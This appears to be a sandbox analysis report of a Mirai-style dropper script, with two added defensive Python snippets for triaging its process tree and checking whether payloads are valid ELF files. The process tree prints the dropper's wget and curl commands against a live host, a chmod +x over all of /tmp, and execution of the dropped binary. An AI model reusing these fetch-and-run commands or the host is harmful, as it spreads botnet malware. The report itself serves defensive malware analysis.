Analysis
- max time kernel: 2s
- max time network: 131s
- platform: ubuntu-18.04_amd64
- resource: ubuntu1804-amd64-20240611-en
- resource tags: arch:amd64, arch:i386, image:ubuntu1804-amd64-20240611-en, kernel:4.15.0-213-generic, locale:en-us, os:ubuntu-18.04-amd64, system
- submitted: 21/11/2024, 08:50
Static task
- static1
Behavioral tasks
- behavioral1: sample f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh, resource ubuntu1804-amd64-20240611-en
- behavioral2: sample f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh, resource debian9-armhf-20240729-en
- behavioral3: sample f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh, resource debian9-mipsbe-20240611-en
- behavioral4: sample f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh, resource debian9-mipsel-20240418-en
The signatures, process tree and downloads below come from behavioral1 (ubuntu-18.04 amd64, matching the platform listed above). Results from the armhf, mipsbe and mipsel runs are not included on this page.
General
- Target: f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh
- Size: 1KB
- MD5: 0b5a60057fc9d9ce95ba5cdaab501e68
- SHA1: 879040e7114865f81dbd3f2fb41409e0cb3b8966
- SHA256: f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1
- SHA512: d97b13f656458456b934ab1cdc205ec4efedebfa8ee98675ba38865e916563487d1fd5c649afad7376f469a60ecd16b7c502c549ac095d8be234f6d9e876f351
Malware Config: none extracted on this page.
Signatures
- File and Directory Permissions Modification (1 TTP, 10 IoCs)
  Adversaries may modify file or directory permissions to evade defenses.
  PID / process: 1498 chmod, 1506 chmod, 1511 chmod, 1516 chmod, 1521 chmod, 1533 chmod, 1539 chmod, 1544 chmod, 1549 chmod, 1554 chmod
- Executes dropped EXE (10 IoCs)
  IoC: /tmp/3AvA
  PID / process: 1499 3AvA, 1507 3AvA, 1512 3AvA, 1517 3AvA, 1522 3AvA, 1534 3AvA, 1540 3AvA, 1545 3AvA, 1550 3AvA, 1555 3AvA
- System Network Configuration Discovery (1 TTP, 4 IoCs)
  Adversaries may gather information about the network configuration of a system.
  PID / process: 1500 wget, 1504 curl, 1505 cat, 1507 3AvA
  Note that this tag fires only on the four processes of the mips iteration; the identical commands in the other nine iterations are not tagged, so treat it as a sandbox heuristic rather than a distinct capability of the script.
- Writes file to tmp directory (11 IoCs)
  Malware often drops required files in the /tmp directory.
  Files opened for modification (IoC, process):
  - /tmp/IGxModz.x86, curl
  - /tmp/IGxModz.mips, curl
  - /tmp/IGxModz.mpsl, curl
  - /tmp/IGxModz.arm4, curl
  - /tmp/IGxModz.arm5, curl
  - /tmp/IGxModz.arm6, curl
  - /tmp/IGxModz.arm7, curl
  - /tmp/IGxModz.ppc, curl
  - /tmp/IGxModz.m68k, curl
  - /tmp/IGxModz.sh4, curl
  - /tmp/3AvA, f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh
  The sandbox attributes every /tmp/IGxModz.* write to curl, and the /tmp/3AvA write to the shell process itself rather than to cat or curl, which is consistent with a shell redirection of cat's output into 3AvA.
Processes
- PID 1494  /tmp/f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh
  Command line: /tmp/f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh
  Signatures: Writes file to tmp directory
  Children (all direct children of PID 1494, in spawn order):
  - PID 1495  /usr/bin/wget
    wget http://154.213.189.14/bns/IGxModz.x86
  - PID 1496  /usr/bin/curl
    curl -O http://154.213.189.14/bns/IGxModz.x86
    Signatures: Writes file to tmp directory
  - PID 1497  /bin/cat
    cat IGxModz.x86
  - PID 1498  /bin/chmod
    chmod +x 3AvA config-err-gACG2o f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.x86 netplan_4tig9c16 snap-private-tmp ssh-zntWNVcxk98c systemd-private-3e892b2e10504022a70d94fecf5dc4e7-bolt.service-tkmHeq systemd-private-3e892b2e10504022a70d94fecf5dc4e7-colord.service-deBSYp systemd-private-3e892b2e10504022a70d94fecf5dc4e7-ModemManager.service-t5VM7n systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-resolved.service-nHmr6O systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-timedated.service-nPo1H1
    Signatures: File and Directory Permissions Modification
  - PID 1499  /tmp/3AvA
    ./3AvA x86
    Signatures: Executes dropped EXE
  - PID 1500  /usr/bin/wget
    wget http://154.213.189.14/bns/IGxModz.mips
    Signatures: System Network Configuration Discovery
  - PID 1504  /usr/bin/curl
    curl -O http://154.213.189.14/bns/IGxModz.mips
    Signatures: System Network Configuration Discovery; Writes file to tmp directory
  - PID 1505  /bin/cat
    cat IGxModz.mips
    Signatures: System Network Configuration Discovery
  - PID 1506  /bin/chmod
    chmod +x 3AvA config-err-gACG2o f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.mips IGxModz.x86 netplan_4tig9c16 snap-private-tmp ssh-zntWNVcxk98c systemd-private-3e892b2e10504022a70d94fecf5dc4e7-bolt.service-tkmHeq systemd-private-3e892b2e10504022a70d94fecf5dc4e7-colord.service-deBSYp systemd-private-3e892b2e10504022a70d94fecf5dc4e7-ModemManager.service-t5VM7n systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-resolved.service-nHmr6O systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-timedated.service-nPo1H1
    Signatures: File and Directory Permissions Modification
  - PID 1507  /tmp/3AvA
    ./3AvA mips
    Signatures: Executes dropped EXE; System Network Configuration Discovery
  - PID 1508  /usr/bin/wget
    wget http://154.213.189.14/bns/IGxModz.mpsl
  - PID 1509  /usr/bin/curl
    curl -O http://154.213.189.14/bns/IGxModz.mpsl
    Signatures: Writes file to tmp directory
  - PID 1510  /bin/cat
    cat IGxModz.mpsl
  - PID 1511  /bin/chmod
    chmod +x 3AvA config-err-gACG2o f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.mips IGxModz.mpsl IGxModz.x86 netplan_4tig9c16 snap-private-tmp ssh-zntWNVcxk98c systemd-private-3e892b2e10504022a70d94fecf5dc4e7-bolt.service-tkmHeq systemd-private-3e892b2e10504022a70d94fecf5dc4e7-colord.service-deBSYp systemd-private-3e892b2e10504022a70d94fecf5dc4e7-ModemManager.service-t5VM7n systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-resolved.service-nHmr6O systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-timedated.service-nPo1H1
    Signatures: File and Directory Permissions Modification
  - PID 1512  /tmp/3AvA
    ./3AvA mpsl
    Signatures: Executes dropped EXE
  - PID 1513  /usr/bin/wget
    wget http://154.213.189.14/bns/IGxModz.arm4
  - PID 1514  /usr/bin/curl
    curl -O http://154.213.189.14/bns/IGxModz.arm4
    Signatures: Writes file to tmp directory
  - PID 1515  /bin/cat
    cat IGxModz.arm4
  - PID 1516  /bin/chmod
    chmod +x 3AvA config-err-gACG2o f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.mips IGxModz.mpsl IGxModz.x86 netplan_4tig9c16 snap-private-tmp ssh-zntWNVcxk98c systemd-private-3e892b2e10504022a70d94fecf5dc4e7-bolt.service-tkmHeq systemd-private-3e892b2e10504022a70d94fecf5dc4e7-colord.service-deBSYp systemd-private-3e892b2e10504022a70d94fecf5dc4e7-ModemManager.service-t5VM7n systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-resolved.service-nHmr6O systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-timedated.service-nPo1H1
    Signatures: File and Directory Permissions Modification
  - PID 1517  /tmp/3AvA
    ./3AvA arm4
    Signatures: Executes dropped EXE
  - PID 1518  /usr/bin/wget
    wget http://154.213.189.14/bns/IGxModz.arm5
  - PID 1519  /usr/bin/curl
    curl -O http://154.213.189.14/bns/IGxModz.arm5
    Signatures: Writes file to tmp directory
  - PID 1520  /bin/cat
    cat IGxModz.arm5
  - PID 1521  /bin/chmod
    chmod +x 3AvA config-err-gACG2o f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.mips IGxModz.mpsl IGxModz.x86 netplan_4tig9c16 snap-private-tmp ssh-zntWNVcxk98c systemd-private-3e892b2e10504022a70d94fecf5dc4e7-bolt.service-tkmHeq systemd-private-3e892b2e10504022a70d94fecf5dc4e7-colord.service-deBSYp systemd-private-3e892b2e10504022a70d94fecf5dc4e7-ModemManager.service-t5VM7n systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-resolved.service-nHmr6O systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-timedated.service-nPo1H1
    Signatures: File and Directory Permissions Modification
  - PID 1522  /tmp/3AvA
    ./3AvA arm5
    Signatures: Executes dropped EXE
  - PID 1523  /usr/bin/wget
    wget http://154.213.189.14/bns/IGxModz.arm6
  - PID 1524  /usr/bin/curl
    curl -O http://154.213.189.14/bns/IGxModz.arm6
    Signatures: Writes file to tmp directory
  - PID 1532  /bin/cat
    cat IGxModz.arm6
  - PID 1533  /bin/chmod
    chmod +x 3AvA config-err-gACG2o f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.mips IGxModz.mpsl IGxModz.x86 netplan_4tig9c16 snap-private-tmp ssh-zntWNVcxk98c systemd-private-3e892b2e10504022a70d94fecf5dc4e7-bolt.service-tkmHeq systemd-private-3e892b2e10504022a70d94fecf5dc4e7-colord.service-deBSYp systemd-private-3e892b2e10504022a70d94fecf5dc4e7-ModemManager.service-t5VM7n systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-resolved.service-nHmr6O systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-timedated.service-nPo1H1
    Signatures: File and Directory Permissions Modification
  - PID 1534  /tmp/3AvA
    ./3AvA arm6
    Signatures: Executes dropped EXE
  - PID 1535  /usr/bin/wget
    wget http://154.213.189.14/bns/IGxModz.arm7
  - PID 1537  /usr/bin/curl
    curl -O http://154.213.189.14/bns/IGxModz.arm7
    Signatures: Writes file to tmp directory
  - PID 1538  /bin/cat
    cat IGxModz.arm7
  - PID 1539  /bin/chmod
    chmod +x 3AvA config-err-gACG2o f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.arm7 IGxModz.mips IGxModz.mpsl IGxModz.x86 netplan_4tig9c16 snap-private-tmp ssh-zntWNVcxk98c systemd-private-3e892b2e10504022a70d94fecf5dc4e7-bolt.service-tkmHeq systemd-private-3e892b2e10504022a70d94fecf5dc4e7-colord.service-deBSYp systemd-private-3e892b2e10504022a70d94fecf5dc4e7-ModemManager.service-t5VM7n systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-resolved.service-nHmr6O systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-timedated.service-nPo1H1
    Signatures: File and Directory Permissions Modification
  - PID 1540  /tmp/3AvA
    ./3AvA arm7
    Signatures: Executes dropped EXE
  - PID 1541  /usr/bin/wget
    wget http://154.213.189.14/bns/IGxModz.ppc
  - PID 1542  /usr/bin/curl
    curl -O http://154.213.189.14/bns/IGxModz.ppc
    Signatures: Writes file to tmp directory
  - PID 1543  /bin/cat
    cat IGxModz.ppc
  - PID 1544  /bin/chmod
    chmod +x 3AvA config-err-gACG2o f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.arm7 IGxModz.mips IGxModz.mpsl IGxModz.ppc IGxModz.x86 netplan_4tig9c16 snap-private-tmp ssh-zntWNVcxk98c systemd-private-3e892b2e10504022a70d94fecf5dc4e7-bolt.service-tkmHeq systemd-private-3e892b2e10504022a70d94fecf5dc4e7-colord.service-deBSYp systemd-private-3e892b2e10504022a70d94fecf5dc4e7-ModemManager.service-t5VM7n systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-resolved.service-nHmr6O systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-timedated.service-nPo1H1
    Signatures: File and Directory Permissions Modification
  - PID 1545  /tmp/3AvA
    ./3AvA ppc
    Signatures: Executes dropped EXE
  - PID 1546  /usr/bin/wget
    wget http://154.213.189.14/bns/IGxModz.m68k
  - PID 1547  /usr/bin/curl
    curl -O http://154.213.189.14/bns/IGxModz.m68k
    Signatures: Writes file to tmp directory
  - PID 1548  /bin/cat
    cat IGxModz.m68k
  - PID 1549  /bin/chmod
    chmod +x 3AvA config-err-gACG2o f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.arm7 IGxModz.m68k IGxModz.mips IGxModz.mpsl IGxModz.ppc IGxModz.x86 netplan_4tig9c16 snap-private-tmp ssh-zntWNVcxk98c systemd-private-3e892b2e10504022a70d94fecf5dc4e7-bolt.service-tkmHeq systemd-private-3e892b2e10504022a70d94fecf5dc4e7-colord.service-deBSYp systemd-private-3e892b2e10504022a70d94fecf5dc4e7-ModemManager.service-t5VM7n systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-resolved.service-nHmr6O systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-timedated.service-nPo1H1
    Signatures: File and Directory Permissions Modification
  - PID 1550  /tmp/3AvA
    ./3AvA m68k
    Signatures: Executes dropped EXE
  - PID 1551  /usr/bin/wget
    wget http://154.213.189.14/bns/IGxModz.sh4
  - PID 1552  /usr/bin/curl
    curl -O http://154.213.189.14/bns/IGxModz.sh4
    Signatures: Writes file to tmp directory
  - PID 1553  /bin/cat
    cat IGxModz.sh4
  - PID 1554  /bin/chmod
    chmod +x 3AvA config-err-gACG2o f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.arm7 IGxModz.m68k IGxModz.mips IGxModz.mpsl IGxModz.ppc IGxModz.sh4 IGxModz.x86 netplan_4tig9c16 snap-private-tmp ssh-zntWNVcxk98c systemd-private-3e892b2e10504022a70d94fecf5dc4e7-bolt.service-tkmHeq systemd-private-3e892b2e10504022a70d94fecf5dc4e7-colord.service-deBSYp systemd-private-3e892b2e10504022a70d94fecf5dc4e7-ModemManager.service-t5VM7n systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-resolved.service-nHmr6O systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-timedated.service-nPo1H1
    Signatures: File and Directory Permissions Modification
  - PID 1555  /tmp/3AvA
    ./3AvA sh4
    Signatures: Executes dropped EXE

Reading the tree: for each of the ten architecture suffixes (x86, mips, mpsl, arm4, arm5, arm6, arm7, ppc, m68k, sh4) the script runs the same five-step sequence from /tmp: wget of http://154.213.189.14/bns/IGxModz.<arch>, curl -O of the same URL (a fallback for hosts without wget), cat of the downloaded file, chmod +x, and then execution of /tmp/3AvA with the suffix as its only argument. This is the standard Mirai-style multi-architecture dropper loop. Two details are worth noting. First, every chmod invocation carries the full contents of /tmp in collation order, including the sandbox's own snap-private-tmp and systemd-private-* directories and the script itself; that is what an unquoted `chmod +x *` expands to, so the script hands executable permission to everything in the directory rather than naming its payload. Second, the downloaded IGxModz.* file is never executed directly; each iteration runs the same /tmp/3AvA, which the shell process itself opens for modification, consistent with the cat output being redirected into 3AvA before the exec. The script's own source is not reproduced on this page.
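The following is an added example, not part of the sandbox report or the sample: a small triage function that turns process records like the ones in the Signatures and Processes sections above into the findings a responder wants from this kind of run (the single download host, the set of architecture suffixes requested, whether chmod +x was applied through a /tmp glob, and which /tmp binaries were executed). The `PROCESSES` list is constructed from the tree above and keeps only a representative subset of the 50 children, with the chmod argument list shortened; the suffix list and the glob markers are assumptions about Mirai-style droppers, not values taken from this report.

```python
import re

# Constructed from the process tree above: (pid, parent pid, image, command line).
# Representative subset; every architecture iteration has the same five-step shape.
PROCESSES = [
    (1494, 1, "/tmp/f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh",
     "/tmp/f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh"),
    (1495, 1494, "/usr/bin/wget", "wget http://154.213.189.14/bns/IGxModz.x86"),
    (1496, 1494, "/usr/bin/curl", "curl -O http://154.213.189.14/bns/IGxModz.x86"),
    (1497, 1494, "/bin/cat", "cat IGxModz.x86"),
    (1498, 1494, "/bin/chmod",
     "chmod +x 3AvA config-err-gACG2o IGxModz.x86 snap-private-tmp "
     "systemd-private-3e892b2e10504022a70d94fecf5dc4e7-bolt.service-tkmHeq"),
    (1499, 1494, "/tmp/3AvA", "./3AvA x86"),
    (1500, 1494, "/usr/bin/wget", "wget http://154.213.189.14/bns/IGxModz.mips"),
    (1504, 1494, "/usr/bin/curl", "curl -O http://154.213.189.14/bns/IGxModz.mips"),
    (1507, 1494, "/tmp/3AvA", "./3AvA mips"),
    (1509, 1494, "/usr/bin/curl", "curl -O http://154.213.189.14/bns/IGxModz.mpsl"),
    (1512, 1494, "/tmp/3AvA", "./3AvA mpsl"),
    (1514, 1494, "/usr/bin/curl", "curl -O http://154.213.189.14/bns/IGxModz.arm7"),
    (1540, 1494, "/tmp/3AvA", "./3AvA arm7"),
    (1552, 1494, "/usr/bin/curl", "curl -O http://154.213.189.14/bns/IGxModz.sh4"),
    (1555, 1494, "/tmp/3AvA", "./3AvA sh4"),
]

URL_RE = re.compile(r"https?://([^/\s]+)(/\S*)")
# Assumed: file-name suffixes commonly used by Mirai-style multi-architecture droppers.
ARCH_SUFFIXES = {"x86", "x86_64", "i586", "i686", "mips", "mpsl", "arm", "arm4", "arm5",
                 "arm6", "arm7", "ppc", "m68k", "sh4", "spc"}
# Assumed: names that appear in chmod's argv only when an unquoted `*` expands inside /tmp.
TMP_GLOB_MARKERS = ("systemd-private-", "snap-private-tmp")
DOWNLOADERS = ("/wget", "/curl")


def analyse(processes):
    """Summarise the dropper pattern: download host(s), arch suffixes requested,
    chmod +x applied through a /tmp glob, and binaries executed out of /tmp."""
    pids = {p[0] for p in processes}
    roots = {p[0] for p in processes if p[1] not in pids}  # parent not in the list
    hosts, arches, urls = set(), set(), []
    chmod_glob = False
    dropped_exec = []
    for pid, ppid, image, cmdline in processes:
        argv = cmdline.split()
        if image.endswith(DOWNLOADERS):
            for m in URL_RE.finditer(cmdline):
                urls.append(m.group(0))
                hosts.add(m.group(1))
                name = m.group(2).rsplit("/", 1)[-1]
                suffix = name.rsplit(".", 1)[-1] if "." in name else ""
                if suffix in ARCH_SUFFIXES:
                    arches.add(suffix)
        elif image.endswith("/chmod") and "+x" in argv:
            if any(a.startswith(TMP_GLOB_MARKERS) for a in argv):
                chmod_glob = True
        elif image.startswith("/tmp/") and pid not in roots:
            # A binary under /tmp run by the script: the "Executes dropped EXE" signature.
            dropped_exec.append((pid, image, argv[1] if len(argv) > 1 else ""))
    verdict = len(hosts) == 1 and len(arches) >= 3 and bool(dropped_exec)
    return {
        "hosts": hosts,
        "urls": urls,
        "arches": arches,
        "chmod_glob": chmod_glob,
        "dropped_exec": dropped_exec,
        "multi_arch_dropper": verdict,
    }


if __name__ == "__main__":
    for key, value in analyse(PROCESSES).items():
        print(f"{key}: {value}")
```

The verdict deliberately requires a single host, several architecture suffixes and at least one execution from /tmp together; any one of those alone (a lone curl -O, a chmod +x in /tmp) is common in benign build and install scripts.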
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 276B
  MD5: 960b4fa9d5383373f0a1ea04929df01b
  SHA1: f78054d817db7742162a706b5d9f1fedcdf21140
  SHA256: 3e3036a7715bae7bda5c0b2de74731a835b869ded4d470cddb7f6521114aca7a
  SHA512: 2d5c6ad2bb0f8a8b971d759e3618e8636034cee5b76c362c2107b7fadc38bcaabbaa79cd19f5f2e949005e3d128b1a4efff187d1a3f035791dcbd1255b7ed73f
Only one downloaded file is recorded, and the page does not say which of the ten URLs returned it. At 276 bytes it is far too small to be a compiled bot for any of the requested architectures; it may be an error page or a short script, which this page does not show. The durable indicators from this run are therefore the dropper script's hashes (General section) and the URL prefix http://154.213.189.14/bns/IGxModz., not the hashes of this download.
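Before spending time on a fetched IGxModz.* file, a practitioner would check whether it is even an ELF executable for the architecture its suffix claims, which is exactly the question the 276-byte download above raises. The following is an added example and not code from the report or the sandbox: it reads the ELF identification bytes and e_machine and compares them with the suffix. The e_machine values are the standard ELF constants; the `fake_elf` header stubs and the `PLACEHOLDER_276` blob are constructed for the demonstration and are not the real download, whose content the page does not show.

```python
import struct

# ELF constants from the System V ABI, keyed by the dropper's own file-name suffixes.
# Value: (expected e_machine, expected EI_DATA, or None when the suffix does not fix endianness).
ELFDATA2LSB, ELFDATA2MSB = 1, 2
ET_EXEC = 2
EXPECTED = {
    "x86":  (3,  ELFDATA2LSB),   # EM_386
    "mips": (8,  ELFDATA2MSB),   # EM_MIPS, big-endian
    "mpsl": (8,  ELFDATA2LSB),   # EM_MIPS, little-endian
    "arm4": (40, None), "arm5": (40, None), "arm6": (40, None), "arm7": (40, None),  # EM_ARM
    "ppc":  (20, ELFDATA2MSB),   # EM_PPC
    "m68k": (4,  ELFDATA2MSB),   # EM_68K
    "sh4":  (42, None),          # EM_SH
}


def classify_payload(blob, suffix):
    """Return (ok, reason): is `blob` an ELF executable matching the architecture `suffix`?"""
    if suffix not in EXPECTED:
        return False, f"unknown architecture suffix {suffix!r}"
    if len(blob) < 20 or blob[:4] != b"\x7fELF":
        return False, f"not an ELF image ({len(blob)} bytes, starts with {blob[:12]!r})"
    ei_class, ei_data = blob[4], blob[5]
    if ei_data not in (ELFDATA2LSB, ELFDATA2MSB):
        return False, f"invalid EI_DATA {ei_data}"
    # e_type and e_machine are the two 16-bit fields right after the 16-byte e_ident.
    fmt = ("<" if ei_data == ELFDATA2LSB else ">") + "HH"
    e_type, e_machine = struct.unpack(fmt, blob[16:20])
    want_machine, want_data = EXPECTED[suffix]
    if e_machine != want_machine:
        return False, f"e_machine {e_machine} does not match {suffix} (expected {want_machine})"
    if want_data is not None and ei_data != want_data:
        return False, f"endianness {ei_data} does not match {suffix}"
    if e_type != ET_EXEC:  # Mirai-style bots are statically linked ET_EXEC images
        return False, f"e_type {e_type} is not ET_EXEC"
    bits = 64 if ei_class == 2 else 32
    return True, f"ELF{bits} e_machine={e_machine} {'LE' if ei_data == ELFDATA2LSB else 'BE'}"


def fake_elf(e_machine, ei_data, ei_class=1, e_type=ET_EXEC):
    """Constructed 52-byte ELF32 header stub for testing; not a real binary."""
    ident = b"\x7fELF" + bytes([ei_class, ei_data, 1]) + b"\x00" * 9
    fmt = ("<" if ei_data == ELFDATA2LSB else ">") + "HH"
    return (ident + struct.pack(fmt, e_type, e_machine)).ljust(52, b"\x00")


# Constructed stand-in for a 276-byte non-ELF response; the real content is not on the page.
PLACEHOLDER_276 = (b"<html><head><title>404 Not Found</title></head>"
                   b"<body><h1>Not Found</h1></body></html>\n").ljust(276, b"\n")


if __name__ == "__main__":
    print("placeholder as x86:", classify_payload(PLACEHOLDER_276, "x86"))
    print("BE MIPS header as mips:", classify_payload(fake_elf(8, ELFDATA2MSB), "mips"))
    print("LE MIPS header as mips:", classify_payload(fake_elf(8, ELFDATA2LSB), "mips"))
```

The endianness check matters for the mips/mpsl pair: both carry EM_MIPS, and only EI_DATA separates them, so a payload that parses as ELF can still be the wrong file for the box it was fetched on.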